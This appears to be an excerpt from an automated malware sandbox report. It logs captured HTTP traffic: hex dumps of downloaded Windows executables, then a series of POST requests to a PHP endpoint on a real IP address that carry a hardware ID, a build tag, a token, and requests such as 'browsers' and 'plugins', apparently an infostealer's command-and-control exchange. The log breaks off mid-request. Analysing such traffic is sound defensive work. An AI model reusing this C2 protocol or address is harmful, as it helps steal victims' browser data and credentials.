00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 32 41 34 31 34 30 31 38 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 2d 2d 0d 0a Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="hwid"992A4140186F1350827015------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="build"reno------KEBFHIJECFIDGDGCGHCG--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="message"browsers------JDAFBKECAKFCAAAKJDAK--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"plugins------HJJKFBGCFHCGDHIDAAEC--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"f2259fda4d5b409f428371759f99120ff74deedf4632bcf8d96b752366d91d5840e8a070------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="message"fplugins------AFCBAEBAEBFHCAKFCAKE--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.215.113.115Content-Length: 6295Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJDHost: 185.215.113.115Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 32 32 35 39 66 64 61 34 64 35 62 34 30 39 66 34 32 38 33 37 31 37 35 39 66 39 39 31 32 30 66 66 37 34 64 65 65 64 66 34 36 33 32 62 63 66 38 64 39 36 62 37 35 32 33 36 36 64 39 31 64 35 38 34 30 65 38 61 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 